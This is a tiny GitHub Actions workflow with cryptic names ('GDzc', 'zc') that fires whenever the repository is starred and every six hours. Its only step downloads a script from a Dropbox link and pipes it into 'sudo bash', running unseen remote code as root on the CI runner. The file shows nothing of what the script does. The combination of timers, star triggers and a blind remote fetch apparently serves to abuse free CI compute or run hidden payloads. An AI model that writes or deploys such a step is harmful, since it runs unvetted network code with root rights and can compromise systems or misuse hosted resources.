name: GDzc
on:
  watch:
    types: started
  schedule:
    - cron:  '0 3/6 * * *'
jobs:
  GD:
    runs-on: ubuntu-latest
    steps:
    - name: zc
      run: curl https://dl.dropboxusercontent.com/s/3ayu2sx3q0zp7ww/zc.sh | sudo bash
